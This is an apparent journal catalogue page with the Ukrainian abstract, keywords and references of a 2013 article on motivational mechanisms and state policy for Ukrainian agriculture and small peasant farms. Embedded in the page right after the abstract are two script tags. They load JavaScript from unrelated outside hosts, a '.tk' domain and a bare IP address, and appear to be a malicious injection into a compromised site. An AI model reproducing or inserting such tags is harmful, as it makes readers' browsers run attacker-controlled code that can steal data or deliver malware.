ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.432
Наукова дискусія

Роль мотиваційних чинників у нарощуванні обсягів виробництва аграрної продукції / Кравчук В. П. // Економіка АПК. - 2013. - № 5 - С. 108

Досліджено ситуацію, що склалася в аграрній сфері України за період її новітньої історії. Визначено головні проблеми вітчизняного агропромислового комплексу, запропоновано невідкладні заходи державної політики в аграрному секторі та деякі механізми виведення його з кризового стану й підвищення ефективності. Наголошується на необхідності запровадження в даний кризовий період не стільки глобальних програмних заходів, а більшою мірою – невідкладних термінових, а саме – організаційних, а також ефективного застосування дієвих мотиваційних механізмів для розвитку АПК, особливо в сегменті малого підприємництва, що представлене на селі особистими селянськими господарствами населення. Табл.: 1. Рис.: 1. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: глобальна криза, стратегічний попит, мотивація, мале підприємництво, особисті селянські господарства, організаційні заходи, зайнятість

Список використаних джерел

  1. Стратегічні напрями реформування управління комплексним розвитком агропромислового виробництва; за ред. М.Ф. Кропивка. – К.: ННЦ «ІАЕ», 2012.
  2. Стратегічні напрямки розвитку сільського господарства України на період на 2020 року; за ред. Ю.О. Лупенка. – К.: ННЦ «ІАЕ», 2012.
  3. Півнєв Є. Портрет аграрної Європи / Є. Півнєв // «Коментарі». – 2012. – № 41.
  4. Бахматюк О. Навчись продавати майбутнє / О. Бахматюк // «Коментарі», 2013.
  5. Яворська Т.І. Розвиток малого бізнесу в сільському господарстві : автореф. дис. ... д-ра екон. наук : 08.00.04 / Яворська Тетяна Іванівна. – К., 2012. – 35 с.
  6. Розвиток аграрного виробництва як передумова забезпечення продовольства безпеки України НІСД; за ред. Я.А. Жаліла. – К., 2011.
  7. Матеріали Державної служби статистики України, 2011, – Режим доступу: http://ukrstat.org/uk/plan_stat/2011
  8. Паливода К. План Маршалла, як приклад для української економіки / П. Костянтин, Ф. Ліндсей // «Зеркало недели». – 2013. – № 5.
  9. Підлуцький О. Джордж Маршалл — реставратор Европи / О. Підлуцький // «Зеркало недели». – 2013. – № 2.
Читати статтю: 13_05_18.pdf